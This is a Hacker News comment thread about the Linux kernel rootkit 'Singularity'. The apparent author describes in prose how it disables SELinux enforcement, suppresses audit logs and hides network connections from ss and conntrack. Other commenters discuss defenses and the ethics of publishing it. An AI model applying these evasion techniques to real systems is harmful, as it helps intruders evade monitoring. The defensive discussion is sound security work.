10 comments

  • mmh0000 1 day ago
    Hiding from SELinux is clever, but SELinux (for most users not running MLS) is a final level of defense. If you get to the point where SELinux is saving your butt, you've got problems higher up in the stack.

    For me, the real scary part is the hiding "Audit Evasion" (for those not in the know, here's a link https://www.redhat.com/en/blog/configure-linux-auditing-audi...);

    Audit is supposed to be able to track anything and everything that happens on a Linux box. Every login, application, socket, syscall, all of it. The fact that they can bypass it is HUGE. You're not supposed to be able to disable auditd without rebooting the system (when correctly configured). And rebooting the system should* trigger other alarms for the security team.

    • kpcyrd 1 day ago
      The rootkit runs in ring0, at that point all kernel-enforced security controls are potentially compromised. Instead, you need to prevent the kernel module from being loaded in the first place. There are multiple ways to ensure no further kernel modules can be loaded without rebooting the computer, e.g. by having pid=1 drop CAP_SYS_MODULE out of it's bounding set before starting any child processes. After it has been loaded it's too late to do anything about the integrity of your system.
      • hugo1789 1 day ago
        That is a critical observation. Last time I had to root an Android device it hat pretty robust defenses like dm-verity and strict SELinux policies (correctly configured) and then everything collapsed because the system loaded a exfat kernel module from an unverified filesystem.

        Permitting user-loaded kernel modules effectively invalidates all other security measures.

        • stackghost 1 day ago
          I'm quite surprised to learn that Android allows this
    • finagler 1 day ago
      > SELinux (for most users not running MLS) is a final level of defense

      if so, why is it there at all?

      Years back when our team was dealing with weird permission issues on multiple levels due to SELinux, I found little value in it.

      • arcfour 12 hours ago
        I don't mean this to come off as rude, but how much did you know about SELinux?

        Because in my experience, when people are "dealing with weird...issues" and "[finding] little value in it" they usually don't understand what it is and how to use it.

        This makes any tool difficult to appreciate.

      • mmh0000 16 hours ago
        Don't misunderstand my original post. SELinux is AMAZING. But, if SELinux in the default "targeted" policy is the thing that's protecting you, that's good, but it means there are some major bugs or misconfiguration higher up (i.e., in your web server).

        I assume you know what a network firewall is. Think of SELinux like a "System Call Firewall". SELinux will protect you from many so-called "zero-day" vulnerabilities. It watches every syscall an application makes, looks at its policy, and decides if that syscall should be allowed/denied. It is a good thing.

        However, SELinux is really not user-friendly, though it is extremely well documented and learnable. (run `man -k selinux` to see all the man pages) Red Hat also has thorough documentation (https://docs.redhat.com/en/documentation/red_hat_enterprise_...)

        Specifically, to your "weird permission issues". That is a "problem" with SELinux; it doesn't surface errors well. The TL;DR is: if you get a "permission denied" error, and you rule out the obvious (i.e., filesystem permissions), then you need to know to blame SELinux and look at the `/var/log/audit/audit.log` file.

        That file is technically human readable, but there are tools that make it much easier, such as `ausearch` and `sealert -a`.

        ---

        https://danwalsh.livejournal.com/71122.html

        "Now this is a horrible exploit but as you can see SELinux would probably have protected a lot/most of your valuable data on your machine. It would buy you time for you to patch your system."

      • bitfilped 1 day ago
        ...as a last line of defense. MAC is also a stronger system than DAC to being with, so a lot of places may opt to have it in place anyway for inexperienced/careless/lazy admin mistakes. Sorry you struggled with writing SEL policies, but it's a very valuable tool when you run systems that are exposed to the internet or other hostile environments.
  • matheuzsec 1 day ago
    The rootkit now disables SELinux enforcing mode on-demand when the ICMP reverse shell is triggered, leaving zero audit logs.

    How it works: SELinux maintains a global kernel structure called selinux_state that contains the enforcement flag. The rootkit resolves this non-exported symbol via kallsyms at module load time, then directly writes enforcing = 0 when triggered. This bypasses the normal setenforce() interface entirely.

    The clever part is the dual-layer approach:

    * Hooks netlink_unicast to drop audit messages for hidden PIDs

    * Attempts to modify selinux_state->enforcing directly in kernel memory

    On kernels built with CONFIG_SECURITY_SELINUX_DEVELOP=y, SELinux enforcement may stop at the kernel decision level, while userspace tools continue to report enforcing mode and /var/log/audit/audit.log shows nothing.

    - Advanced Network Hiding

    Previous versions only hide TCP connections from /proc/net/tcp* by hooking tcp_seq_show, which blocked netstat. But modern tools like ss and conntrack bypass /proc entirely - they query the kernel directly via netlink.

    The new version filters at the netlink layer:

    * SOCK_DIAG filtering: ss uses NETLINK_SOCK_DIAG protocol to get socket info directly from the kernel. Singularity hooks recvmsg to intercept and filter these netlink responses before userspace sees them. Commands like ss -tapen or lsof -i return empty for hidden connections.

    * Conntrack filtering: Connection tracking (nf_conntrack) maintains state for all network flows. Reading /proc/net/nf_conntrack or running conntrack -L would expose hidden connections. The rootkit now filters both the proc interface and NETLINK_NETFILTER messages with conntrack types. * UDP hiding: Added hooks for udp4_seq_show and udp6_seq_show - previous versions only hide TCP.

    - Other improvements:

    * Optimized log filtering (switched from multiple strstr() calls to switch-case with strncmp()) * Audit statistics tracking (get_blocked_audit_count(), get_total_audit_count()) * Automated setup script

    Repo: https://github.com/MatheuZSecurity/Singularity

    • transpute 1 day ago
      > The rootkit now disables SELinux enforcing mode on-demand when the ICMP reverse shell is triggered, leaving zero audit logs.

      Is this independent of the Linux Security Modules policy, e.g. RHEL default policy for SE Linux?

  • RandomGerm4n 1 day ago
    This does not seem to work with Fedora Atomic. Because the system is read-only, the kernel module cannot be loaded. You would have to create an RPM package for the rootkit that you can then layer. In addition, due to Secure Boot, the kernel module would have to be signed with the same key as the system itself.
    • wmf 1 day ago
      insmod can load a module from anywhere (surely /tmp is writable), even stdin. That's why you definitely want to block unknown kernel modules.
      • Joel_Mckay 1 day ago
        Most production OS I saw would do this on boot-up completion:

        echo 1 > /proc/sys/kernel/modules_disabled

        Which is supposed to block dynamic loading modules until a reboot.

        It would be interesting if the PoC can get around that trick too. =3

        • lima 1 day ago
          If Kernel Lockdown is enabled, a zero-day exploit is required to bypass module restrictions without a reboot.

          Unfortunately, threat actors tend to have a stash of them and the initial entry vector often involves one (container or browser sandbox escape), and once you have that, you are in ring 0 already and one flipped bit away from loading the module.

          The Linux kernel is not really an effective privilege boundary.

        • worthless-trash 19 hours ago
          Once you have memory write as ring0, all protections are dubious at best.

          Why bother loading a module when you can inject code into any function you want.

          • Joel_Mckay 17 hours ago
            The encrypted page memory manager hardware in some ancient Sun systems prevented a lot of these context isolation problems. However, the modern IT landscape chose consumer grade processor architecture and bodged GPUs as the cloud infrastructure foundation.

            Thus, there currently is economic inertia entrenching vulnerable system design. I don't think there is a company large enough to change the situation anytime soon, as the market has spoken. =3

            Rule #3: popularity is not an indication of utility.

        • worthless-trash 19 hours ago
          Or only allow signed kernel modules. Aka secure boot.

          This doesn't solve all vectors but afaics this will prevent non signed modules from loading.

  • kachapopopow 1 day ago
    first thing comes to mind is just grabbing the cr3 and finding it in physical memory for detection.

    also this feels a little bit too much effort for something that was never used in the real world not going to lie.

    ICMP reverse shell is a really cool idea, no persistence makes it rather harmless compared to what is possible.

    • lima 1 day ago
      Red teams (internal or consultants) use this sort of tooling in the real world. Their job is to emulate a real, competent threat actor. APTs routinely use high-quality rootkits for EDR evasion.

      Persistence is actually quite rare nowadays - since it's the most easily detected, red teams usually prefer not to and stay memory-only.

      • kachapopopow 1 day ago
        I guess it makes sense - as for persistence I guess no point in having any if you can just compromise the target again.
        • ronsor 1 day ago
          Many servers and systems are rarely rebooted, and many campaigns are not that long term. There may not be a reason to compromise the target again.

          For example, a ransomware gang may compromise a company's network, steal data, deploy the cryptolocker, and then get out. There's no need to have persistent access; they got what they wanted.

          • kachapopopow 1 day ago
            I know that very well considering I have servers that have 5 years of uptime, but generally the environment isn't the same as it was with cloud services living less than a few hours (or even seconds for functional endpoints) this becomes a problem.

            my first thoughts is that this is actually a vector against people rather than servers which do reboot daily.

  • mrbluecoat 1 day ago
    Impressively polished. Pair with BIOS/UEFI boot persistence and you've got a nasty infection.
    • Joel_Mckay 1 day ago
      Almost as bad as the Intel Management Engine. lol =3
  • hatmanstack 1 day ago
    This looks impressive, haven't had a chance to give it a go, would love a consumable "counters" tutorial for this type of intrusion..."Be a researcher, not a criminal." might be wishful thinking.
  • egberts1 1 day ago
    Entry vector is via user-loadable kernel modules.

    Does not work if kernel Kconfig setting has:

        CONFIG_MODULES=n
    
    All deliverables should have this Kconfig setting disabled.
    • hulitu 1 day ago
      > CONFIG_MODULES=n

      does this work on normal linux desktops ? My impression was that either: 1). Kernel is too big. Try making modules - link error or 2) System will not boot due to missing/misconfigured parts.

      • Joel_Mckay 1 day ago
        Could always try:

        echo 1 > /proc/sys/kernel/modules_disabled

        Which is supposed to block dynamic loading modules until a reboot. =3

        • matheuzsec 1 day ago
          This is not permanent; if the system is rebooted, it will be undone :)
  • bflesch 1 day ago
    Nice. Could it be detected by comparing output of `find /` at runtime with output of `find /` if you mount the disk on another system?
    • KZerda 1 day ago
      Yes. Offline is how a lot of rootkits are analyzed after the admin notices peculiar behavior. There are a lot of other tells that could be run online to find this rootkit though, most notably, its behavior with ftrace. Disabling ftrace, and then running a program that uses ftrace would tell right away that something's wrong.
      • bflesch 1 day ago
        Thanks. So for virtualized systems it would make sense to routinely clone the HDD and do such a comparison. Could easily be included in the backup software.
  • TacticalCoder 1 day ago
    Assuming someone manages to first get root, can kernels only allowing signed modules to be loaded (Talos does that if I'm not mistaken, for example) prevent that stealth rootkit from being loaded? Or can root just bypass that check?

    Or is the only line of defense a kernel compiled without the ability to load modules?

    I know all bets are off once someone already gained root, but not allowing the installation of a stealth rootkit is never bad.

    • wmf 1 day ago
      There are ways to block unsigned modules. You also need to lock down /dev/kmem which apparently distros already do.
  • VoidWhisperer 1 day ago
    I understand that this is to drive research and help security researchers in this case, but I personally think Github should take a harder stance against this kind of repo, education purposes or not - saying it is for educational purposes is definitely not going to stop someone (especially people who wouldn't know how to develop this level of rootkit on their own) from going and using it.

    Also the specific details in README regarding 'make sure you randomize this or you'll be detected!' makes it feel even less like it is explicitly for educational purposes since you are providing users easy instructions on how to work around countermeasures this code.

    • mmh0000 1 day ago
      There are many responses to this, but I'll start with:

      Security through obscurity is not security [1]

      When only l33t underworld h4x0rz know about software flaws, there is very little incentive or ability for regular software developers to find and fix what enables these vulnerabilities. Only through shared knowledge can the world become a better place.

      [1] https://en.wikipedia.org/wiki/Security_through_obscurity

      • kpcyrd 1 day ago
        The second argument doesn't really work out in praxis. We have a quarter century knowledge about SQL injection at this point, yet it keeps happening.

        Instead of trying to educate everybody about how to safely use error-prone programming abstractions, we should instead de-normalize use of them and come up with more robust ones. You don't need to have in-depth exploit development skills to write secure Rust code.

        Unfortunately, there's more money to be made selling security consulting if people stick to the error-prone ones.

    • sounds 1 day ago
      Do you think malware creators find out by reading HN or github? I don't understand the vitriol, the request "Github should take a harder stance" could have a chilling effect on security researchers, pushing high impact exploits deeper underground.
      • VoidWhisperer 1 day ago
        There isn't vitriol, or atleast I didn't mean it that way. The point I was trying to make is that I've seen malicious code like viruses and keyloggers and rootkits being distributed via github and they use the 'this is for education' as a cop-out when the rest of the repo makes it extremely obvious what the real intention is
        • _QrE 1 day ago
          Malware is very easy to build. Competent threat actors don't need to rely on open source software, and incompetent ones can buy what they use from malware authors who sell their stuff in various forums. Concerns similar to yours about 'upgrading' the capabilities of threat actors were raised when NSA made Ghidra public, yet the NSA considers the move itself to have been good (https://www.nsa.gov/Press-Room/News-Highlights/Article/Artic...).

          People will build malware. It is actually both fun and educational. Them sharing it makes the world aware of it, and when people are aware of it, they tend to adjust their security posture for the better if they feel threatened by it. Good cybersecurity research & development raises the bar for the industry and makes the world more secure.

        • xpltr7 1 day ago
          Have you ever heard the phrase: "To stop a hacker you have to think like a hacker." Thats cyber security 101. Without tthe hackers knowledge or programs...you're just a victim or target. But, with this knowledge made available, now you are aware of this program/possibility. Its like when companys deploy honeypot servers to capture the methods & use cases of hackers attacking the server, to build stronger security against their methods and techniques.